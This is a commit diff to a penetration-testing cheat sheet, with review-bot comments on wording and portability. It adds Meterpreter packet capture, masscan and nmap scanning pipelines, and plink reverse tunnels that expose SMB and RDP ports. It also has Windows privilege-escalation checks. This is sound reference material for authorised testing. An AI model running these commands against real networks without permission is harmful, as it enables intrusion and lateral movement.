Network Discovery - Masscan update

This commit is contained in:
Swissky 2019-08-29 01:08:26 +02:00
parent 6c161f26b2
commit bb305d0183
24 changed files with 36 additions and 5 deletions

@ -10,6 +10,7 @@
* [Meterpreter Webdelivery](#meterpreter-webdelivery)
* [Get System](#get-system)
* [Persistence Startup](#persistence-startup)
* [Network Monitoring](#network-monitoring)
* [Portforward](#portforward)
* [Upload / Download](#upload---download)
* [Execute from Memory](#execute-from-memory)
@ -130,6 +131,16 @@ OPTIONS:
meterpreter > run persistence -U -p 4242
### Network Monitoring
# list interfaces
run packetrecorder -li
# record interface n°1
run packetrecorder -i 1
### Portforward
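Review bot: the comment "record interface n°1" above `run packetrecorder -i 1` reads oddly in an English reference; say "record on interface 1" so the number visibly ties to the `-i 1` argument chosen from the `run packetrecorder -li` listing. The section also never says where the capture lands, so add one line stating where packetrecorder writes the PCAP (or how to choose the directory) so the reader does not have to hunt for the file after the session ends.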

@ -103,8 +103,21 @@ List Nmap scripts : ls /usr/share/nmap/scripts/
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 --rate 1000
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
# find machines on the network
sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst
# find open ports for one machine
sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
# TCP grab banners and services informations
TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP
# UDP grab banners and services informations
UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
## Reconnoitre
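Review bot: the per-host step writes to `$MACHINE_IP/scans/masscan-ports.lst` but nothing creates that directory; masscan does not create parent directories for `-oL`, so the command fails on a fresh run unless `mkdir -p $MACHINE_IP/scans` precedes it. Two smaller points in the same hunk: `head -c -1` (used to drop the trailing comma from `TCP_PORTS`/`UDP_PORTS`) is GNU-only, so `sed 's/,$//'` or `paste -sd,` would be portable; and the old `masscan -iL ips-online.txt ... --only-open -oL masscan.out` line was the only example that scanned from a host list, so consider keeping it alongside the new `$NETWORK`-based discovery rather than dropping it.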

@ -195,10 +195,17 @@ python --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
## plink
plink -l root -pw toor ssh-server-ip -R 3390: --> exposes the RDP port of the machine in the port 3390 of the SSH Server
# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:
plink -l root -pw mypassword -R
plink.exe -v -pw mypassword user@ -L 6666:
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:
## ngrok
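Review bot: the comment "redirects the Windows port 445 to Kali on port 22" on the last added line is misleading: in `plink -P 22 -l root -pw some_password -C -R 445:` the `-P 22` is the SSH server port being connected to, not a forwarding target; it is the `-R 445:` clause that exposes the Windows host's port 445 on the Kali side, so reword to something like "connects to the SSH server on port 22 and exposes the Windows port 445 on Kali". Also, the new SMB line `plink -l root -pw toor -R 445:` omits the `ssh-server-ip` argument that the RDP line right below it keeps; make the two consistent. Since every example passes `-pw` on the command line, a one-line caveat that the password then shows up in shell history and process listings would be worth adding here.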

@ -490,7 +490,8 @@ net start upnphost
sc config upnphost depend=""
Using [`accesschk`]( from Sysinternals.
Using [`accesschk`]( from Sysinternals or [accesschk-XP.exe -](
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
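Review bot: the new sentence offers `accesschk-XP.exe` as an alternative to the Sysinternals `accesschk` but does not say when to use it; add the reason (e.g. which Windows versions the current Sysinternals build no longer runs on) so the reader knows which binary to pick. Minor style point: `$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula` is a Windows command but carries a Unix `$` prompt; the other Windows snippets in this file would read more consistently with a `>` prompt or no prompt at all.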
@ -588,7 +589,6 @@ Check if these registry values are set to "1".
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
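Review bot: the lead-in says to check whether the values are set to "1", but `reg query ... /v AlwaysInstallElevated` prints REG_DWORD values in hex, so a reader will see `0x1`; say `0x1` (or "1 / 0x1") to avoid confusion. Same prompt nit as above: these are Windows `reg query` commands shown with a `$` prompt.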